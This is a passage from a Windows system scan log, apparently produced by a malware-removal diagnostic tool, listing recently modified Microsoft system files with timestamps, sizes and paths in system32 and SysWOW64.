2017-04-12 11:19 - 2017-03-28 07:12 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00542208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2017-04-12 11:19 - 2017-03-28 07:11 - 02994176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-04-12 11:19 - 2017-03-28 07:11 - 02646528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-04-12 11:19 - 2017-03-28 07:11 - 01576448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2017-04-12 11:19 - 2017-03-28 07:11 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll
2017-04-12 11:19 - 2017-03-28 07:11 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2017-04-12 11:19 - 2017-03-28 07:10 - 02483200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-04-12 11:19 - 2017-03-28 07:08 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2017-04-12 11:19 - 2017-03-28 07:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RADCUI.dll
2017-04-12 11:19 - 2017-03-28 06:48 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-04-12 11:19 - 2017-03-16 06:38 - 00034088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CompPkgSup.dll
2017-04-12 11:18 - 2017-03-28 08:07 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2017-04-12 11:18 - 2017-03-28 08:05 - 01504056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-04-12 11:18 - 2017-03-28 08:04 - 05721808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-04-12 11:18 - 2017-03-28 08:04 - 02262776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-04-12 11:18 - 2017-03-28 08:04 - 01431232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-04-12 11:18 - 2017-03-28 08:04 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-04-12 11:18 - 2017-03-28 08:02 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2017-04-12 11:18 - 2017-03-28 07:59 - 06667520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-04-12 11:18 - 2017-03-28 07:59 - 04023008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 20967840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 01851688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 01344448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 01277856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 01202936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 00961192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-04-12 11:18 - 2017-03-28 07:48 - 05685760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-04-12 11:18 - 2017-03-28 07:37 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2017-04-12 11:18 - 2017-03-28 07:35 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-04-12 11:18 - 2017-03-28 07:33 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll
2017-04-12 11:18 - 2017-03-28 07:33 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-04-12 11:18 - 2017-03-28 07:33 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2017-04-12 11:18 - 2017-03-28 07:32 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2017-04-12 11:18 - 2017-03-28 07:32 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll
2017-04-12 11:18 - 2017-03-28 07:32 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2017-04-12 11:18 - 2017-03-28 07:26 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll
2017-04-12 11:18 - 2017-03-28 07:25 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2017-04-12 11:18 - 2017-03-28 07:24 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2017-04-12 11:18 - 2017-03-28 07:24 - 04614656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-04-12 11:18 - 2017-03-28 07:24 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-04-12 11:18 - 2017-03-28 07:23 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-04-12 11:18 - 2017-03-28 07:23 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-04-12 11:18 - 2017-03-28 07:18 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-04-12 11:18 - 2017-03-28 07:17 - 06109696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-04-12 11:18 - 2017-03-28 07:16 - 03198464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2017-04-12 11:18 - 2017-03-28 07:14 - 07468544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-04-12 11:18 - 2017-03-28 07:14 - 00103936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Devices.dll
2017-04-12 11:18 - 2017-03-28 07:13 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-04-12 11:18 - 2017-03-28 07:13 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll
2017-04-12 11:18 - 2017-03-28 07:13 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 00862208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2017-04-12 11:18 - 2017-03-28 07:11 - 01600000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-04-12 11:18 - 2017-03-28 07:09 - 03106304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2017-04-12 11:18 - 2017-03-28 07:08 - 01564160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-04-12 11:17 - 2017-03-28 07:10 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-04-12 11:16 - 2017-03-28 07:36 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2017-04-12 11:16 - 2017-03-28 07:36 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-04-12 11:16 - 2017-03-28 07:33 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2017-04-12 11:16 - 2017-03-28 07:33 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinRtTracing.dll
2017-04-12 11:16 - 2017-03-28 07:33 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Core.dll
2017-04-12 11:16 - 2017-03-28 07:28 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll
2017-04-12 11:16 - 2017-03-28 07:28 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-04-12 11:16 - 2017-03-28 07:28 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-04-12 11:16 - 2017-03-28 07:27 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2017-04-12 11:16 - 2017-03-28 07:27 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\WwaApi.dll
2017-04-12 11:16 - 2017-03-28 07:26 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll
2017-04-12 11:16 - 2017-03-28 07:13 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-04-12 11:15 - 2017-03-28 07:30 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebcamUi.dll
2017-04-12 11:15 - 2017-03-28 07:25 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll
2017-04-12 11:15 - 2017-03-28 07:14 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe
2017-04-12 11:15 - 2017-03-28 07:14 - 01080320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Ocr.dll
2017-04-12 11:15 - 2017-03-28 07:13 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe
2017-04-12 11:15 - 2017-03-28 07:10 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll
2017-04-12 11:15 - 2017-03-28 07:10 - 01424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-04-12 11:15 - 2017-03-28 07:10 - 01266176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2017-04-12 11:15 - 2017-03-28 07:09 - 01369088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll
2017-04-12 11:14 - 2017-03-28 08:26 - 00218520 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2017-04-12 11:14 - 2017-03-28 08:09 - 00097128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Credentials.UI.CredentialPicker.dll
2017-04-12 11:14 - 2017-03-28 08:05 - 01072248 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2017-04-12 11:14 - 2017-03-28 07:38 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-04-12 11:14 - 2017-03-28 07:37 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-04-12 11:14 - 2017-03-28 07:35 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-04-12 11:14 - 2017-03-28 07:35 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-04-12 11:14 - 2017-03-28 07:34 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp
2017-04-12 11:14 - 2017-03-28 07:31 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-04-12 11:14 - 2017-03-28 07:29 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-04-12 11:14 - 2017-03-28 07:26 - 00284160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-04-12 11:14 - 2017-03-28 07:21 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll
2017-04-12 11:14 - 2017-03-28 07:18 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll
2017-04-12 11:14 - 2017-03-28 07:18 - 00100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2017-04-12 11:14 - 2017-03-28 07:15 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2017-04-12 11:14 - 2017-03-28 07:13 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll
2017-04-12 11:13 - 2017-03-28 08:32 - 00198856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll
2017-04-12 11:13 - 2017-03-28 08:29 - 02213248 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-04-12 11:13 - 2017-03-28 08:28 - 00773720 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-04-12 11:13 - 2017-03-28 08:20 - 01181024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-04-12 11:13 - 2017-03-28 08:18 - 01705976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-04-12 11:13 - 2017-03-28 08:10 - 01293152 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-04-12 11:13 - 2017-03-28 08:06 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 22221368 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 01988048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 01848584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 01702392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 01302136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2017-04-12 11:13 - 2017-03-28 07:59 - 02533728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-04-12 11:13 - 2017-03-28 07:41 - 00372736 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2017-04-12 11:13 - 2017-03-28 07:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\RdpRelayTransport.dll
2017-04-12 11:13 - 2017-03-28 07:34 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2017-04-12 11:13 - 2017-03-28 07:31 - 00418304 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll
2017-04-12 11:13 - 2017-03-28 07:31 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll
2017-04-12 11:13 - 2017-03-28 07:31 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkBindingEngineMigPlugin.dll
2017-04-12 11:13 - 2017-03-28 07:29 - 00293888 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-04-12 11:13 - 2017-03-28 07:29 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2017-04-12 11:13 - 2017-03-28 07:28 - 00456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2017-04-12 11:13 - 2017-03-28 07:28 - 00252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2017-04-12 11:13 - 2017-03-28 07:27 - 00441856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll
2017-04-12 11:13 - 2017-03-28 07:26 - 00549376 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-04-12 11:13 - 2017-03-28 07:24 - 01220096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2017-04-12 11:13 - 2017-03-28 07:22 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2017-04-12 11:13 - 2017-03-28 07:21 - 03778048 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-04-12 11:13 - 2017-03-28 07:19 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-04-12 11:13 - 2017-03-28 07:18 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-04-12 11:13 - 2017-03-28 07:16 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2017-04-12 11:13 - 2017-03-28 07:15 - 02390016 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-04-12 11:13 - 2017-03-28 07:14 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVP9DEC.dll
2017-04-12 11:13 - 2017-03-28 07:12 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2017-04-12 11:13 - 2017-03-28 07:11 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll
2017-04-12 11:13 - 2017-03-28 07:09 - 01131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-04-12 11:13 - 2017-03-28 07:06 - 00999424 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-04-12 11:12 - 2017-03-28 08:12 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2017-04-12 11:12 - 2017-03-28 08:11 - 01860288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-04-12 11:12 - 2017-03-28 08:11 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2017-04-12 11:12 - 2017-03-28 08:10 - 07220184 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-04-12 11:12 - 2017-03-28 08:05 - 08168512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-04-12 11:12 - 2017-03-28 08:05 - 04260576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2017-04-12 11:12 - 2017-03-28 07:58 - 00387872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-04-12 11:12 - 2017-03-28 07:38 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-04-12 11:12 - 2017-03-28 07:31 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2017-04-12 11:12 - 2017-03-28 07:30 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-04-12 11:12 - 2017-03-28 07:30 - 00692224 _____ (Microsoft Corporation) C:\WINDOWS\system32\CellularAPI.dll
2017-04-12 11:12 - 2017-03-28 07:29 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2017-04-12 11:12 - 2017-03-28 07:29 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-04-12 11:12 - 2017-03-28 07:28 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-04-12 11:12 - 2017-03-28 07:28 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-04-12 11:12 - 2017-03-28 07:27 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll
2017-04-12 11:12 - 2017-03-28 07:26 - 01145344 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2017-04-12 11:12 - 2017-03-28 07:24 - 06288384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-04-12 11:12 - 2017-03-28 07:21 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll
2017-04-12 11:12 - 2017-03-28 07:19 - 07655424 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-04-12 11:12 - 2017-03-28 07:17 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-04-12 11:12 - 2017-03-28 07:15 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll
2017-04-12 11:12 - 2017-03-28 07:11 - 01981440 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-04-12 11:12 - 2017-03-28 07:10 - 08076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-04-12 11:12 - 2017-03-28 07:09 - 04149248 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2017-04-12 11:11 - 2017-03-28 08:28 - 07786336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-04-12 11:11 - 2017-03-28 08:26 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2017-04-12 11:11 - 2017-03-28 08:22 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2017-04-12 11:11 - 2017-03-28 08:11 - 02187616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-04-12 11:11 - 2017-03-28 08:11 - 01738560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-04-12 11:11 - 2017-03-28 08:11 - 00402784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-04-12 11:11 - 2017-03-28 08:10 - 02758648 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-04-12 11:11 - 2017-03-28 08:10 - 01157008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-04-12 11:11 - 2017-03-28 08:04 - 01276760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-04-12 11:11 - 2017-03-28 08:04 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-04-12 11:11 - 2017-03-28 08:04 - 00160088 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2017-04-12 11:11 - 2017-03-28 07:37 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DdcWnsListener.dll
2017-04-12 11:11 - 2017-03-28 07:36 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-04-12 11:11 - 2017-03-28 07:35 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2017-04-12 11:11 - 2017-03-28 07:35 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Printers.dll
2017-04-12 11:11 - 2017-03-28 07:33 - 00270336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-04-12 11:11 - 2017-03-28 07:33 - 00182272 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceDirectoryClient.dll
2017-04-12 11:11 - 2017-03-28 07:32 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2017-04-12 11:11 - 2017-03-28 07:32 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00276992 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-04-12 11:11 - 2017-03-28 07:31 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SerialCommunication.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Lights.dll
2017-04-12 11:11 - 2017-03-28 07:30 - 00568320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll
2017-04-12 11:11 - 2017-03-28 07:30 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll
2017-04-12 11:11 - 2017-03-28 07:30 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-04-12 11:11 - 2017-03-28 07:30 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafpos.dll
2017-04-12 11:11 - 2017-03-28 07:29 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll
2017-04-12 11:11 - 2017-03-28 07:29 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-04-12 11:11 - 2017-03-28 07:29 - 00311296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
2017-04-12 11:11 - 2017-03-28 07:29 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll
2017-04-12 11:11 - 2017-03-28 07:28 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll
2017-04-12 11:11 - 2017-03-28 07:28 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2017-04-12 11:11 - 2017-03-28 07:27 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll
2017-04-12 11:11 - 2017-03-28 07:27 - 00472064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2017-04-12 11:11 - 2017-03-28 07:26 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll
2017-04-12 11:11 - 2017-03-28 07:25 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-04-12 11:11 - 2017-03-28 07:23 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-04-12 11:11 - 2017-03-28 07:23 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-04-12 11:11 - 2017-03-28 07:21 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll
2017-04-12 11:11 - 2017-03-28 07:20 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll
2017-04-12 11:11 - 2017-03-28 07:20 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-04-12 11:11 - 2017-03-28 07:19 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2017-04-12 11:11 - 2017-03-28 07:19 - 00235520 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2017-04-12 11:11 - 2017-03-28 07:15 - 00981504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2017-04-12 11:11 - 2017-03-28 07:15 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
